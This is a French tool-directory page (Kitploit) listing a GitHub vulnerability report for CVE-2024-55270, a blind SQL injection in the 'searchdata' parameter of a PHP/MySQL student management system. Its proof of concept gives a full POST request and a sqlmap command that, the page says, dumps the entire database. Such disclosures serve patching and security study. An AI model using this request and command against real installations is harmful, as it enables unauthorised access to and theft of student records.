Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-55270 — Système de gestion des étudiants utilisant PHP et MySQL | Kitploit
Outils/GitHubGitHub/shoaibalam112/cve-2024-55270
Analyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubshoaibalam112/cve-2024-55270

CVE-2024-55270

Système de gestion des étudiants utilisant PHP et MySQL

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Système de Gestion des Étudiants 1.0 (CVE-2024-55270)

Présentation

Le Système de Gestion des Étudiants (SMS) est une application web développée en PHP et MySQL pour gérer les informations des étudiants. Ce dépôt contient le code source et les détails du système, ainsi qu'un rapport de vulnérabilité de sécurité.

Auditeur :
Shoaib Alam - Profil LinkedIn


Rapport de Vulnérabilité de Sécurité

Description

Une vulnérabilité d'Injection SQL Aveugle a été détectée dans le Système de Gestion des Étudiants. Ce problème affecte le paramètre searchdata dans la fonction de recherche de l'application.

  • Point d'accès vulnérable : /studentms/admin/search.php
  • Paramètre vulnérable : searchdata

Le paramètre est sensible à une Injection SQL Aveugle en raison d'un assainissement insuffisant des entrées. Un attaquant pourrait exploiter cette vulnérabilité en injectant des requêtes SQL malveillantes dans l'entrée , obtenant potentiellement un accès non autorisé à la base de données ou à d'autres informations sensibles.

searchdata
searchdata

Preuve de Concept (PoC)

URL vulnérable

/studentms/admin/search.php

Exemple de requête POST

root@kitploit:~
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

searchdata=*&search=
  1. Enregistrez la requête POST ci-dessus dans un fichier req.txt à l'aide du Bloc-notes ou de tout éditeur de texte.

  2. Utilisez un outil tel que SQLMAP pour exploiter la vulnérabilité en appliquant cette commande (vous pouvez la personnaliser) : sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3

La commande ci-dessus videra l'intégralité de la base de données de l'application web.

Télécharger l’outil